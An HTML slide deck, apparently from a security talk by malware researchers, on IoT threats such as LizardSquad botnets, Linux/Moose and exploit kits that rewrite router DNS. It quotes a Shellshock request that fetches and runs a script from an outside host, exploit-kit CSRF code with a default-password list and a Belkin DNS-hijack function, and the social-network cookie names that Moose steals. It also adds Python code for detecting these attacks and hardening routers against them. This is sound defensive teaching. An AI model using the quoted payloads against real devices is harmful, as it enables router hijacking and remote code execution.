internet-of-threats.html
<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Internet of {Things,Threats}</title><meta content="yes" name="apple-mobile-web-app-capable" /><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style" /><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, minimal-ui" name="viewport" /><link href="reveal.js/css/reveal.css" rel="stylesheet" /><link rel="stylesheet" href="reveal.js/css/theme/owasp.css" id="theme" /><link href="reveal.js/lib/css/zenburn.css" rel="stylesheet" /><script>document.write( '<link rel="stylesheet" href="reveal.js/css/print/' + ( window.location.search.match( /print-pdf/gi ) ? 'pdf' : 'paper' ) + '.css" type="text/css" media="print">' );</script></head><body><div class="reveal"><div class="slides"><section data-background-size="contain" data-background-image="images/hf/iot-hacker-lol.png"><h1>.</h1><p><small></small></p></section><section id="_iot_or_internet_of_things_threats"><h2>IoT or Internet of {Things,Threats}</h2><aside class="notes">but who are we?</aside></section>
<section id="_thomas_nyx_o"><h2>Thomas (@nyx__o)</h2><div class="ulist"><ul><li><p>Malware Researcher at ESET <span class="image" style="float: right"><img src="images/eset.png" alt="eset" width="300" /></span></p></li><li><p>CTF lover</p></li><li><p>Open source contributor</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>My name is Thomas Dupuy, I am a Malware Researcher at ESET.</p></li><li><p>I enjoy spending time solving challenges, hence my participation in many CTFs.</p></li><li><p>I try to contribute to open source projects around reverse engineering or malware.</p></li></ul></div></aside></section>
<section id="_olivier_obilodeau"><h2>Olivier (@obilodeau)</h2><div class="ulist"><ul><li><p>Security Researcher at GoSecure <span class="image" style="float: right"><img src="images/gosecure.png" alt="gosecure" width="300" /></span></p></li><li><p>Previously</p><div class="ulist"><ul><li><p>Malware Researcher at ESET</p></li><li><p>Infosec lecturer at ETS University in Montreal</p></li><li><p>Infosec developer, network admin, linux system admin</p></li></ul></div></li><li><p>Co-founder Montrehack (hands-on security workshops)</p></li><li><p>Founder NorthSec Hacker Jeopardy</p></li></ul></div></section>
<section id="_agenda"><h2>Agenda</h2><div class="ulist"><ul><li><p>About IoT</p></li><li><p>LizardSquad</p></li><li><p>Linux/Moose</p></li><li><p>Exploit Kit</p></li><li><p>Win32/RBrute</p></li><li><p>Conclusion</p></li></ul></div>
<aside class="notes"><div class="paragraph"><p>Our agenda:
We'll start with LizardSquad, script-kiddie botnets that got a lot of ink.
Then Linux/Moose, a strange animal.
Followed by Exploit Kit and RBrute, two types of threats that manage to change routers' DNS settings.
And finish with a conclusion and some tips to avoid most of these problems.</p></div></aside></section>
<section><div class="imageblock" style=""><div class="content"><img src="images/hf/0.png" alt="0" /></div></div>
<aside class="notes"><div class="paragraph"><p>IoT devices are connected devices,
starting from a frying pan</p></div></aside></section>
<section data-background-size="contain" data-background-image="images/hf/1.png"><aside class="notes"><div class="paragraph"><p>to a light bulb</p></div></aside></section>
<section><div class="imageblock" style=""><div class="content"><img src="images/hf/4.png" alt="4" /></div></div></section>
<section><div class="imageblock" style=""><div class="content"><img src="images/hf/3.png" alt="3" /></div></div>
<aside class="notes"><div class="paragraph"><p>via coffee makers that let you recover the Wi-Fi password</p></div></aside></section>
<section><div class="imageblock" style=""><div class="content"><img src="images/hf/2.png" alt="2" /></div></div>
<aside class="notes"><div class="paragraph"><p>or even weirder things</p></div></aside></section>
<section id="_why_it_matters"><h2>Why Does It Matter?</h2><div class="ulist"><ul><li><p>Hard to detect</p></li><li><p>Hard to remediate</p></li><li><p>Hard to fix</p></li><li><p>Low-hanging fruit for bad guys</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>detect: no AV, interacts w/ outside network</p></li><li><p>remediate: no shell</p></li><li><p>fix: no vendor updates</p></li><li><p>low hanging fruit: easy to build botnet and no one cares</p></li></ul></div></aside></section>
<section id="_a_real_threat"><h2>A Real Threat</h2><div class="ulist"><ul><li><p>Several cases disclosed in the last two years</p></li><li><p>A lot of same-old background noise (DDoSer)</p></li><li><p>Things are only getting worse</p></li></ul></div></section>
<section data-background="images/headline-incapsula.png" data-background-size="contain"><aside class="notes"><div class="ulist"><ul><li><p>mass scale</p></li></ul></div></aside></section>
<section data-background="images/headline-eset-rbrute.png" data-background-size="contain"><aside class="notes"><div class="ulist"><ul><li><p>windows cross-infecting routers</p></li></ul></div></aside></section>
<section data-background="images/headline-cisco.png" data-background-size="contain"><aside class="notes"><div class="ulist"><ul><li><p>targeting Cisco</p></li></ul></div></aside></section>
<section data-background="images/headline-eset-moose.png" data-background-size="contain"><aside class="notes"><div class="ulist"><ul><li><p>some of ESET’s research</p></li></ul></div></aside></section>
<section data-background="images/headline-bbc-reincarna.png" data-background-size="contain"><aside class="notes"><div class="ulist"><ul><li><p>someone even got fed up and decided to clean all the routers</p></li></ul></div></aside></section>
<section data-background="images/headline-register-barbie.png" data-background-size="contain"><aside class="notes">and future targets</aside></section>
<section id="_wait_is_iot_malware_really_about_things"><h2>Wait, is IoT malware really about things?</h2></section>
<section id="_no_not_yet" data-background="#125F79"><h2>No. Not yet.</h2><aside class="notes"><div class="ulist"><ul><li><p>Affected yes, but as collateral damage</p></li><li><p>so what is affected?</p></li></ul></div></aside></section>
<section data-background="images/hf/lots-of-routers.png" data-background-size="contain"><aside class="notes"><div class="ulist"><ul><li><p>or better represented by what they are worth in terms of security</p></li></ul></div></aside></section>
<section data-background="images/hf/electronic-waste.jpg" data-background-size="contain"><aside class="notes"><div class="ulist"><ul><li><p>but we understand: market pressure, etc.</p></li><li><p>still, the situation will have to change</p></li><li><p>a matter of time before IoT at large is hit (if this continues)</p></li></ul></div></aside></section>
<section id="_so_what_kind_of_malware_can_we_find_on_such_insecure_devices"><h2>So what kind of malware can we find on such insecure devices?</h2></section>
<section id="_lizardsquad" data-background="#125F79"><h2>LizardSquad</h2></section>
<section data-background="images/hf/lizardsquad.jpeg" data-background-size="contain"></section>
<section id="_who_are_lizardsquad"><h2>Who are LizardSquad?</h2><div class="ulist"><ul><li><p>Black hat hacking group</p></li><li><p>Lots of Distributed Denial of Service (DDoS)</p></li><li><p>DDoS PlayStation Network and Xbox live in Christmas 2014</p></li><li><p>Bomb threats</p></li><li><p>DDoS for hire (LizardStresser)</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>6 of them were arrested in August</p></li></ul></div></aside></section>
<section id="_des_cyber_chenapans" data-background="#125F79"><h2>CYBER-RASCALS!</h2></section>
<section data-background="images/headline-krebs.png" data-background-size="contain"></section>
<section id="_the_malware"><h2>The Malware</h2><div class="ulist"><ul><li><p>Linux/Gafgyt</p></li><li><p>Linux/Powbot, Linux/Aidra, Kaiten, …​</p></li><li><p>Probably others, as source is public</p></li></ul></div></section>
<section id="_caracteristics"><h2>Characteristics</h2><div class="ulist"><ul><li><p>Telnet scanner</p></li><li><p>Flooding: UDP, TCP, Junk and Hold</p></li></ul></div></section>
<section id="_some_server_code"><h2>Some Server Code</h2><div class="listingblock oversize2"><div class="content"><pre class="highlight"><code class="C language-C">"*****************************************"
"* WELCOME TO THE BALL PIT *"
"* Now with *refrigerator* support *"
"*****************************************"</code></pre></div></div>
<aside class="notes"><div class="ulist"><ul><li><p>with refrigerator support ;)</p></li></ul></div></aside></section>
<section id="_attack_vectors"><h2>Attack Vectors</h2><div class="ulist"><ul><li><p>Shellshock</p></li><li><p>SSH credentials brute-force</p></li><li><p>Telnet credentials brute-force</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>brute force with a short list of weak passwords</p></li></ul></div></aside></section>
<section id="_exemple_of_shellshock_attempt"><h2>Example of Shellshock Attempt</h2><div class="listingblock"><div class="content"><pre class="highlight"><code>GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: () { goo;}; wget -qO - http://o.kei.su/qn | sh > /dev/null 2>&1 &</code></pre></div></div></section>
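<section id="_added_example_shellshock_detection"><h2>Detecting Such Attempts in Request Logs</h2><div class="paragraph"><p>A CGI handler exports request headers as environment variables, and the Shellshock trigger is a header value that starts with <code>() {</code>, so the attempt above can be flagged at the web server or proxy before it ever reaches a shell. The following Python is an added example (not code from the talk) that parses raw requests in the form shown on the slide and reports the offending header; the sample requests are constructed, with a placeholder download URL.</p></div>

```python
import re
from typing import Dict, List, Optional, Tuple

# Bash exported imported function definitions as environment variables whose value
# starts with "() {"; CGI handlers export request headers as HTTP_* environment
# variables, which is what made headers such as User-Agent a Shellshock vector.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Paths where an exported header actually reaches a shell raise the severity.
CGI_PATH_RE = re.compile(r"/cgi-bin/|\.(?:cgi|sh)(?:\?|$)")


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Parse a raw HTTP/1.x request head into (method, path, headers)."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def classify_request(raw: str) -> Optional[Dict[str, str]]:
    """Return a finding if any header carries the Shellshock trigger, else None."""
    method, path, headers = parse_request(raw)
    for name, value in headers.items():
        if SHELLSHOCK_RE.search(value):
            return {
                "method": method,
                "path": path,
                "header": name,
                "severity": "high" if CGI_PATH_RE.search(path) else "medium",
            }
    return None


def scan_requests(requests: List[str]) -> List[Dict[str, str]]:
    """Run the classifier over a batch of raw requests and keep the hits."""
    return [f for f in (classify_request(r) for r in requests) if f]


# Constructed sample traffic (not captured data): the first mirrors the shape of
# the attempt on the slide with a placeholder URL, the second is benign, the
# third hides the trigger in a header other than User-Agent.
SAMPLE_REQUESTS = [
    "GET /cgi-bin/authLogin.cgi HTTP/1.1\r\nHost: 127.0.0.1\r\n"
    "User-Agent: () { goo;}; wget -qO - http://example.invalid/stage1 | sh\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: 127.0.0.1\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n",
    "GET /status.html HTTP/1.1\r\nHost: 127.0.0.1\r\n"
    "Referer: () { :;}; /bin/true\r\n\r\n",
]

if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_REQUESTS):
        print(finding)
```
</section>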
<section id="_other_variants"><h2>Other Variants</h2><div class="ulist"><ul><li><p>HTTPS support</p></li><li><p>CloudFlare protection bypass</p></li></ul></div></section>
<section data-background="images/hf/cloudflare.png" data-background-size="contain"></section>
<section id="_sophisticated"><h2>Sophisticated?</h2><div class="ulist"><ul><li><p>LizardStresser database was leaked</p></li><li><p>Passwords in plaintext…​</p></li></ul></div></section>
<section id="_irc_command_and_control"><h2>IRC Command and Control</h2><div class="listingblock"><div class="content"><pre class="highlight"><code>------- Day changed to 08/25/15 -------
09:32 -!- There are 0 users and 2085 invisible on 1 servers
09:32 -!- 42 unknown connection(s)
09:32 -!- 3 channels formed
09:32 -!- I have 2085 clients and 0 servers
09:32 -!- 2085 2119 Current local users 2085, max 2119
09:32 -!- 2085 2119 Current global users 2085, max 2119</code></pre></div></div></section>
<section id="_bot_masters"><h2>Bot Masters</h2><div class="listingblock"><div class="content"><pre class="highlight"><code>12:56 -!- Topic for #Fazzix: 1k
12:56 -!- Topic set by void <> (Wed Aug 19 09:58:45 2015)
12:56 [Users #Fazzix]
12:56 [~void] [~void_] [@bob1k] [@Fazzix] [ Myutro]·
12:56 -!- Irssi: #Fazzix: Total of 5 nicks (4 ops, 0 halfops, 0 voices, 1 normal)
12:56 -!- Channel #Fazzix created Mon Aug 17 03:11:29 2015
12:56 -!- Irssi: Join to #Fazzix was synced in 2 secs</code></pre></div></div>
<aside class="notes"><div class="ulist"><ul><li><p>mostly gamer-related targets: DSLs, game hosting companies, …​</p></li></ul></div></aside></section>
<section id="_linux_moose" data-background="#125F79"><h2>Linux/Moose</h2></section>
<section id="_linux_moose_2"><h2>Linux/Moose</h2><div class="ulist"><ul><li><p>Discovered in November 2014</p></li><li><p>Thoroughly analyzed in early 2015</p></li><li><p>Published a report in late May 2015</p></li></ul></div></section>
<section id="_moose_dna"><h2>Moose DNA</h2><div class="paragraph"><p>aka Malware description</p></div>
<div class="paragraph small"><small>Hang tight, this is a recap</small></div>
<aside class="notes"><div class="paragraph"><p>gory details all in the report</p></div></aside></section>
<section id="_linux_moose_3"><h2>Linux/Moose…​</h2><div class="paragraph"><p>Named after the string "elan" present in the malware executable</p></div>
<div class="paragraph"><p><span class="image"><img src="images/elan-strings.png" alt="elan strings" /></span></p></div>
<aside class="notes"><div class="paragraph"><p>Let's get this out of the way.</p></div>
<div class="paragraph"><p>Elan2 is the file that is downloaded when the malware successfully spreads</p></div></aside></section>
<section id="_elan"><h2>Elan…​?</h2><div class="paragraph"><p><span class="image"><img src="images/moose-silly.jpg" alt="moose silly" /></span></p></div>
<aside class="notes"><div class="paragraph"><p>Moose, thus Linux/Moose was born</p></div>
<div class="paragraph"><p>But after the release of the whitepaper the Internet did some crowd-sourcing</p></div></aside></section>
<section id="_the_lotus_elan"><h2>The Lotus Elan</h2><div class="paragraph"><p><span class="image"><img src="images/lotus-elan.jpg" alt="lotus elan" /></span></p></div>
<aside class="notes"><div class="paragraph"><p>And maybe the malware authors were nostalgic for the Lotus Elan</p></div>
<div class="paragraph"><p>or fans of a famous rock band from near here…​</p></div></aside></section>
<section id="_elán"><h2>Elán</h2><div class="paragraph"><p>The Slovak rock band (from 1969 and still active)</p></div></section>
<section data-background-size="contain" data-background-image="images/Elan-slovak-rock-band.jpg"><aside class="notes">thanks Robert Lipovski for this less obvious
reference for a Canadian</aside></section>
<section id="_network_capabilities"><h2>Network Capabilities</h2><div class="ulist"><ul><li><p>Pivot through firewalls</p></li><li><p>Home-made NAT traversal</p></li><li><p>Custom-made Proxy service</p><div class="ulist"><ul><li><p>only available to a set of whitelisted IP addresses</p></li></ul></div></li><li><p>Remotely configured generic network sniffer</p></li></ul></div>
<aside class="notes"><div class="paragraph"><p>more serious note</p></div>
<div class="ulist"><ul><li><p>Via infected routers</p></li><li><p>None</p></li><li><p>Supporting both SOCKS and HTTP Proxying, listening on port 10073</p></li><li><p>Configured by the C&C server, sniff on all non /32 and non loopback interfaces</p></li></ul></div></aside></section>
<section data-background-size="contain" data-background-image="images/moose-scanner-threads.png"><aside class="notes"><div class="ulist"><div class="title">Worm-like behavior</div><ul><li><p>Tries to replicate via aggressive scanning</p></li><li><p>Will dedicate more resources to scan near current external IP</p></li><li><p>Will also scan on LAN interfaces</p></li><li><p>Will not reinfect an infected device</p></li><li><p>Can replicate across architectures</p></li><li><p>C&C is made aware of new compromises</p></li><li><p>Scans the internet on port 10073 (then 23), witnessed up to 35 threads
dedicated to scanning</p></li><li><p>MIPS and ARM</p></li><li><p>As you’ll see in the next diagram</p></li></ul></div></aside></section>
<section id="_attack_vector"><h2>Attack Vector</h2><div class="ulist"><ul><li><p>Telnet credentials brute-force</p></li><li><p>Wordlist of 304 user/pass entries sent by server</p></li></ul></div></section>
<section id="_compromise_protocol"><h2>Compromise Protocol</h2><div class="paragraph"><p><span class="image"><img src="images/moose-infection-process.png" alt="moose infection process" /></span></p></div>
<aside class="notes"><div class="paragraph"><p>C&C is active during a compromise.</p></div>
<div class="ulist"><div class="title">Advantages:</div><ul><li><p>specific binary for arch</p></li><li><p>can gather add. data</p></li></ul></div>
<div class="ulist"><div class="title">Disadvantage:</div><ul><li><p>If C&C is down, no further compromises happen</p></li></ul></div>
<div class="paragraph"><p>It spreads by finding routers (or devices) with weak or default credentials.</p></div></aside></section>
<section id="_anti_analysis"><h2>Anti-Analysis</h2><div class="ulist"><ul><li><p>Statically linked binary stripped of its debugging symbols</p></li><li><p>Hard to reproduce environment required for malware to operate</p></li><li><p>Misleading strings (getcool.com)</p></li></ul></div>
<aside class="notes"><div class="ulist"><div class="title">Packing several tricks</div><ul><li><p>Makes reverse-engineering tedious as the C library is mixed with malware code.</p></li><li><p>VM was not enough, for best results, we needed to be reachable from the Internet</p></li><li><p>Misleading strings resulted in bad domain takedown attempts by some</p></li></ul></div></aside></section>
<section data-background-size="contain" data-background-image="images/moose-components.png"><aside class="notes">in overview</aside></section>
<section id="_moose_herding"><h2>Moose Herding</h2><div class="paragraph"><p>The Malware Operation</p></div>
<aside class="notes"><div class="paragraph"><p>broad espionage and infiltration capability, what did they use it for?</p></div></aside></section>
<section id="_via_c_c_configuration"><h2>Via C&C Configuration</h2><div class="ulist"><ul><li><p>Network sniffer was used to steal HTTP Cookies</p><div class="ulist"><ul><li><p>Twitter: <code>twll</code>, <code>twid</code></p></li><li><p>Facebook: <code>c_user</code></p></li><li><p>Instagram: <code>ds_user_id</code></p></li><li><p>Google: <code>SAPISID</code>, <code>APISID</code></p></li><li><p>Google Play / Android: <code>LAY_ACTIVE_ACCOUNT</code></p></li><li><p>Youtube: <code>LOGIN_INFO</code></p></li></ul></div></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>The network sniffer was configured to steal cookies</p></li><li><p>Although the effectiveness of that approach is really debatable</p></li></ul></div></aside></section>
<section id="_via_proxy_usage_analysis"><h2>Via Proxy Usage Analysis</h2><div class="ulist"><ul><li><p>Nature of traffic</p></li><li><p>Protocol</p></li><li><p>Targeted social networks</p></li></ul></div></section>
<section data-background-size="contain" data-background-image="images/proxy-usage_traffic-nature.png"><aside class="notes"><div class="ulist"><ul><li><p>Blue: social network</p></li><li><p>Yellow: meta-botnet</p></li><li><p>Light blue: Other</p></li><li><p>As you can see there is no other traffic in the proxy except for social
network traffic and a tiny bit of operational traffic</p></li></ul></div></aside></section>
<section data-background-size="contain" data-background-image="images/proxy-usage_targets.png"><aside class="notes"><div class="paragraph"><p>To track, we followed some accounts we saw in the honeypot traffic</p></div></aside></section>
<section id="_an_example"><h2>An Example</h2><div class="paragraph"><p><span class="image"><img src="images/fraud-example-1.png" alt="fraud example 1" /></span></p></div>
<aside class="notes"><div class="paragraph"><p>Allowed us to find a few profiles created by the operator such as this one.</p></div>
<div class="paragraph"><p>Pattern is &lt; 50 follows per account</p></div></aside></section>
<section id="_an_example_cont"><h2>An Example (cont.)</h2><div class="paragraph"><p><span class="image"><img src="images/fraud-example-2.png" alt="fraud example 2" /></span></p></div>
<aside class="notes">In the followed accounts</aside></section>
<section id="_an_example_cont_2"><h2>An Example (cont.)</h2><div class="paragraph"><p><span class="image"><img src="images/fraud-example-3.png" alt="fraud example 3" /></span></p></div>
<aside class="notes"><div class="paragraph"><p>Same account went from 3k (and I believe that the scheme already started) to
11k with almost no posts</p></div>
<div class="paragraph"><p>From what I know about instagram, I expect a pattern like this to be really
rare (post / follower / following ratio)</p></div>
<div class="paragraph"><p>Several examples we found were not SFW. On a thin line between fitness and
porn. haha</p></div></aside></section>
<section id="_an_example_cont_3"><h2>An Example (cont.)</h2><div class="paragraph"><p><span class="image"><img src="images/fraud-example-4.png" alt="fraud example 4" /></span></p></div></section>
<section id="_anti_tracking"><h2>Anti-Tracking</h2><div class="ulist"><ul><li><p>Proxy access is protected by an IP-based Whitelist</p></li><li><p>So we can’t use the proxy service to evaluate malware population</p></li><li><p>Blind because of HTTPS enforced on social networks</p></li></ul></div>
<aside class="notes"><div class="ulist"><div class="title">Building on the anti-analysis tricks</div><ul><li><p>whitelist given by C&C</p></li><li><p>proxy service: port 10073</p></li><li><p>Pervasive use of HTTPS by social networks means we can’t track the operators’ actions through honeypots</p></li></ul></div></aside></section>
<section data-background-size="contain" data-background-image="images/operation_overview.png"><aside class="notes"><div class="ulist"><ul><li><p>Stolen cookies</p></li><li><p>Social network fraud</p></li><li><p>Reproduction</p></li></ul></div></aside></section>
<section id="_a_strange_animal"><h2>A Strange Animal</h2><div class="ulist"><ul><li><p>not in the DDoS or bitcoin mining business</p></li><li><p>no x86 variant found</p></li><li><p>controlled by a single group of actors</p></li></ul></div>
<aside class="notes">or seemingly controlled anyway</aside></section>
<section id="_status"><h2>Status</h2></section>
<section id="_whitepaper_impact"><h2>Whitepaper Impact</h2><div class="ulist"><ul><li><p>A few weeks after the publication the C&C servers went dark</p><div class="ulist"><ul><li><p>After a reboot, all affected devices should be cleaned</p></li><li><p>But victims were compromised via weak credentials, so they can always be reinfected</p></li></ul></div></li></ul></div>
<aside class="notes">Reboot: due to lack of persistence</aside></section>
<section id="_alive_or_dead"><h2>Alive or dead?</h2><div class="paragraph"><p><span class="image"><img src="images/port-10073-stats.png" alt="port 10073 stats" /></span></p></div>
<aside class="notes">Port 10073 activity</aside></section>
<section id="_yay_except"><h2>Yay! Except…​</h2><div class="paragraph"><p><span class="image"><img src="images/champagne-celebration.gif" alt="champagne celebration" /></span></p></div>
<aside class="notes"><div class="ulist"><ul><li><p>but of course things must happen to mess with your talk</p></li></ul></div></aside></section>
<section id="_linux_moose_update"><h2>Linux/Moose Update</h2><div class="paragraph"><p>New sample in September</p></div>
<div class="ulist"><ul><li><p>New proxy service port (20012)</p></li><li><p>New C&C selection algorithm</p></li><li><p>Few differences</p></li><li><p>Still under scrutiny</p></li></ul></div>
<aside class="notes"><div class="paragraph"><p>and we are careful, we don’t want to rely on strings ;)</p></div></aside></section>
<section><div class="paragraph"><p><span class="image"><img src="images/port-20012-stats_v2.png" alt="port 20012 stats v2" /></span></p></div></section>
<section data-background-size="contain" data-background-image="images/port-activity.png"></section>
<section id="_exploit_kit_targeting_routers" data-background="#125F79"><h2>Exploit Kit Targeting Routers</h2><aside class="notes"><div class="ulist"><ul><li><p>EKs have recently appeared on the embedded scene.</p></li></ul></div></aside></section>
<section id="_exploit_kit_definition"><h2>Exploit Kit Definition</h2><div class="ulist"><ul><li><p>Automate exploitation</p></li><li><p>Targets browsers</p></li><li><p>Common exploits are Adobe and Java</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>As the name suggests, these are kits that automate the exploitation of vulnerabilities.</p></li><li><p>They mainly target browsers: Chrome, Firefox, IE and the plug-ins they use: Flash, Reader, Java.</p></li></ul></div></aside></section>
<section><div class="paragraph"><p><span class="image"><img src="images/hf/exploit-process.png" alt="exploit process" /></span></p></div>
<div class="exampleblock small"><div class="content"><div class="paragraph"><p>source: Malwarebytes</p></div></div></div>
<aside class="notes"><div class="ulist"><ul><li><p>Simply how an EK works.</p></li><li><p>A user browses the web and lands on a compromised site.</p></li><li><p>The EK detects the versions of the user's software.</p></li><li><p>For example, which browser version they use, which plug-ins, which OS?</p></li><li><p>If the user matches one of the prerequisites, they are redirected, via an iframe for example, to the corresponding exploit, which runs the malicious code without their approval.</p></li></ul></div></aside></section>
<section id="_exploit_kit_in_action"><h2>Exploit Kit in Action</h2><div class="paragraph"><p><span class="image"><img src="images/hf/kafeine.png" alt="kafeine" /></span></p></div>
<aside class="notes"><div class="ulist"><ul><li><p>Last year, Kafeine, a blogger, published an article on one of the first, if not the first, EKs targeting routers.</p></li></ul></div></aside></section>
<section id="_exploit_kit_in_action_cont"><h2>Exploit Kit in Action (cont.)</h2><div class="ulist"><ul><li><p>Cross-Site Request Forgery (CSRF)</p></li><li><p>Uses default credentials (HTTP)</p></li><li><p>Changes primary Domain Name System (DNS) server</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>A Cross-Site Request Forgery or CSRF</p></li><li><p>Executing requests through an HTML page</p></li><li><p>How does the operator do that?</p></li></ul></div></aside></section>
<section id="_exploit_kit_csrf"><h2>Exploit Kit CSRF</h2><div class="listingblock oversize2"><div class="content"><pre class="highlight"><code>&lt;html&gt;&lt;head&gt;&lt;script type="text/javascript" src="e_x.js"&gt;&lt;/script&gt;&lt;/head&gt;
&lt;body&gt;
&lt;iframe id="iframe" sandbox="allow-same-origin" style="display: none"&gt;&lt;/iframe&gt;
&lt;script language="javascript"&gt;
var pDNS = "37.139.50.45";
var sDNS = "8.8.8.8";
var passlist=["123456789","root","admin","qwerty","123456789","baseball","football","monkey","letmein","abc123","tata","&lt;eopl&gt;"];</code></pre></div></div>
<aside class="notes"><div class="ulist"><ul><li><p>Here is a piece of the CSRF used.</p></li><li><p>It defines the (malicious) primary DNS.</p></li><li><p>The secondary one, as you can notice, matches Google's public DNS.</p></li><li><p>This is so as not to attract attention if the primary DNS does not respond.</p></li><li><p>Finally the list of passwords it will try to gain access to the router.</p></li></ul></div></aside></section>
<section id="_exploit_kit_how_to"><h2>Exploit Kit How-To</h2><div class="listingblock oversize2"><div class="content"><pre class="highlight"><code>function e_belkin(ip){
var method = "POST";
var url = "";
var data ="";
url="http://"+ip+"/cgi-bin/login.exe?pws=admin";
exp(url, "", "GET");
url="http://"+ip+"/cgi-bin/setup_dns.exe";
data="dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"&dns2_1_t="+sDNS.split('.')[0]+"&dns2_2_t="+sDNS.split('.')[1]+"dns2_3_t="+sDNS.split('.')[2]+"&dns2_4_t="+sDNS.split('.')[3]+"&auto_from_isp=0";
exp(url, data, method);
}</code></pre></div></div>
<aside class="notes"><div class="ulist"><ul><li><p>Depending on the router model it will either brute-force or call a model-specific function</p></li><li><p>For example, this function is specific to certain models of the Belkin range.</p></li><li><p>Here it does not brute-force, it has already entered creds</p></li><li><p>Below we see the CSRF</p></li><li><p>It is a POST request in which it replaces the primary and secondary DNS with a malicious and a legitimate DNS.</p></li></ul></div></aside></section>
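<section id="_added_example_csrf_hardening"><h2>Why the CSRF Works, and the Fix</h2><div class="paragraph"><p>The DNS change succeeds because the router's <code>setup_dns.exe</code> handler accepts any POST that carries a valid session, and the victim's browser attaches that session cookie to a form submitted from the attacker's page. The following Python is an added example (neither the exploit kit's code nor any vendor's firmware) that contrasts such a handler with one that also requires a same-origin Origin/Referer and a per-session CSRF token; <code>Router</code>, <code>Request</code> and <code>ROUTER_HOST</code> are hypothetical models of the device, and the resolver addresses in the simulated request are placeholders.</p></div>

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# Hypothetical router model (assumption: not any vendor's real firmware API);
# the endpoint path echoes the one the exploit kit posts to.
ROUTER_HOST = "192.168.1.1"
DNS_ENDPOINT = "/cgi-bin/setup_dns.exe"


@dataclass
class Request:
    method: str
    path: str
    headers: Dict[str, str]                       # lower-cased header names
    form: Dict[str, str] = field(default_factory=dict)


@dataclass
class Router:
    dns: Tuple[str, str] = ("192.168.1.1", "")    # (primary, secondary) resolvers
    sessions: Dict[str, str] = field(default_factory=dict)  # session id to CSRF token

    def login(self) -> str:
        """Issue a session id; a fresh CSRF token is bound to it for the hardened handler."""
        sid = secrets.token_hex(16)
        self.sessions[sid] = secrets.token_hex(16)
        return sid


def session_of(router: Router, req: Request) -> Optional[str]:
    """Return the valid session id carried in the Cookie header, if any."""
    for part in req.headers.get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == "sid" and value in router.sessions:
            return value
    return None


def vulnerable_setup_dns(router: Router, req: Request) -> int:
    """Vulnerable handler: a valid session cookie is all it checks. The browser
    attaches that cookie to cross-site form posts too, so a hidden form or iframe
    on any page the user visits (the exploit kit's CSRF) can rewrite the resolvers."""
    if req.method != "POST" or req.path != DNS_ENDPOINT:
        return 404
    if session_of(router, req) is None:
        return 401
    router.dns = (req.form.get("dns1", ""), req.form.get("dns2", ""))
    return 200


def hardened_setup_dns(router: Router, req: Request) -> int:
    """Hardened handler: the same state change additionally requires an Origin (or
    Referer) naming the router itself and a per-session CSRF token that a
    cross-origin page cannot read; the token is compared in constant time."""
    if req.method != "POST" or req.path != DNS_ENDPOINT:
        return 404
    sid = session_of(router, req)
    if sid is None:
        return 401
    origin = req.headers.get("origin") or req.headers.get("referer") or ""
    if urlsplit(origin).hostname != ROUTER_HOST:
        return 403
    if not hmac.compare_digest(req.form.get("csrf_token", ""), router.sessions[sid]):
        return 403
    router.dns = (req.form.get("dns1", ""), req.form.get("dns2", ""))
    return 200


def cross_site_post(sid: str) -> Request:
    """Constructed cross-site form post: Origin is the attacker's page, the session
    cookie is attached by the browser, no token is present; resolver is a placeholder."""
    return Request("POST", DNS_ENDPOINT,
                   {"cookie": "sid=" + sid, "origin": "http://attacker.invalid"},
                   {"dns1": "198.51.100.1", "dns2": "8.8.8.8"})


def simulate() -> Dict[str, Tuple[int, Tuple[str, str]]]:
    """Replay the same cross-site post against both handlers; returns (status, resolvers)."""
    results = {}
    for name, handler in (("vulnerable", vulnerable_setup_dns), ("hardened", hardened_setup_dns)):
        router = Router()
        sid = router.login()
        status = handler(router, cross_site_post(sid))
        results[name] = (status, router.dns)
    return results


if __name__ == "__main__":
    for name, (status, dns) in simulate().items():
        print(f"{name}: HTTP {status}, resolvers now {dns}")
```

Neither check replaces fixing the root cause the kit also relies on: a login reachable with default credentials, which the Belkin function above never has to guess.
</section>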
<section id="_exploit_kit_continually_improved"><h2>Exploit Kit Continually Improved</h2><div class="ulist"><ul><li><p>Obfuscation</p></li><li><p>Exploits for CVEs</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>He obfuscated his code and implemented exploits for CVEs.</p></li><li><p>Obfuscation means producing code that is hard to understand.</p></li><li><p>For example, variables can be renamed to meaningless sequences of letters and digits.</p></li><li><p>Or a decryption routine can be implemented.</p></li><li><p>In our case he encrypts his code with AES.</p></li></ul></div></aside></section>
